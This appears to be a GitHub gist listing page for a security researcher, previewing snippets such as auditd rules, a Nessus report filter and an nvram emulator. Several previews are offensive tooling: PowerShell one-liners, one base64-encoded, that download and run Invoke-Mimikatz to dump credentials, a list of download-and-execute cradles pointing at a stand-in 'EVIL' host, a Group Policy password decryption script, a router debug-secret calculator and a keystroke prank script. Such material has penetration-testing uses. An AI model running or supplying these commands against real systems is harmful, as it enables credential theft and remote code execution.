Skip to content

Instantly share code, notes, and snippets.

💭
I'm upto something

kost kost

💭
I'm upto something
Block or report user

Report or block kost

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@kost
kost / Quick-Mimikatz
Created Nov 14, 2018 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master
@kost
kost / audit.rules
Created Apr 26, 2018 — forked from Neo23x0/audit.rules
Linux Auditd Best Practice Configuration
View audit.rules
# ___ ___ __ __
# / | __ ______/ (_) /_____/ /
# / /| |/ / / / __ / / __/ __ /
# / ___ / /_/ / /_/ / / /_/ /_/ /
# /_/ |_\__,_/\__,_/_/\__/\__,_/
#
# Linux Audit Daemon - Best Practice Configuration
# /etc/audit/audit.rules
#
# Compiled by Florian Roth
@kost
kost / gpg-decrypt.rb
Created Nov 21, 2017
Group Policy Preferences (GPP) password decryption
View gpg-decrypt.rb
#!/usr/bin/env ruby
# This tool was released by Chris Gates on Friday, October 19, 2012
# Gemification by Kost
require 'rubygems'
require 'openssl'
require 'base64'
def decrypt(encrypted_data)
padding = "=" * (4 - (encrypted_data.length % 4))
View import_json_appsscript.js
/**
* Retrieves all the rows in the active spreadsheet that contain data and logs the
* values for each row.
* For more information on using the Spreadsheet API, see
* https://developers.google.com/apps-script/service_spreadsheet
*/
function readRows() {
var sheet = SpreadsheetApp.getActiveSheet();
var rows = sheet.getDataRange();
var numRows = rows.getNumRows();
@kost
kost / rotate
Created Apr 30, 2017 — forked from narongdejsrn/rotate
Python code to annoy your friend in Windows OS
View rotate
import win32com.client
import time
import itertools
shell = win32com.client.Dispatch("WScript.Shell")
curArr = ["RIGHT", "DOWN", "LEFT", "UP"]
for element in itertools.cycle(curArr):
shell.SendKeys("^%{" + element + "}", 0)
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@kost
kost / bashbunnyquickstart.md
Last active Apr 8, 2017 — forked from tkisason/bashbunnyquickstart.md
BashBunny quickstart tutorial
View bashbunnyquickstart.md

Custom languages don't work without bbpayload.

  1. Fetch the bashbunny payloads:
git clone https://github.com/hak5/bashbunny-payloads.git
  1. Slide the switch to arming position (all the way to the usb plug)
  2. move contents of payloads/library/DuckyInstall to the payloads/switch1 directory in the bunny
View nessus-services.rb
#!/usr/bin/env ruby
# Filter Nessus XML report to get services identified
# Copyright (C) Kost
require 'nokogiri'
require 'optparse'
require 'logger'
require 'csv'
@kost
kost / zynsecrets.c
Created Mar 13, 2017
Calculate Bootbase/bootext secret for debug commands (ATEN 1,xxxx) - Zyxel, Huawei, ZTE, etc. - similar to zynpass but working for larger devices
View zynsecrets.c
/*
Calculate Bootbase/bootext secret for debug commands
Zyxel, Huawei, ZTE, etc.
Usage:
$ gcc zynsecrets.c -o zynsecrets
$ ./zynsecrets 000102030403
Copyright (C) Kost, https://gist.github.com/kost
View nvram
#!/bin/sh
# nvram emulation shell script (c) kost, https://gist.github.com/kost
#
# Usage (on real device dump the content): nvram show > /tmp/nvram.file
# Copy script and /tmp/nvram.file to the emulation env, start using it
# In case you just need nvram command emulation, just copy script.
#
# uncomment for debug:
# set -x
You can’t perform that action at this time.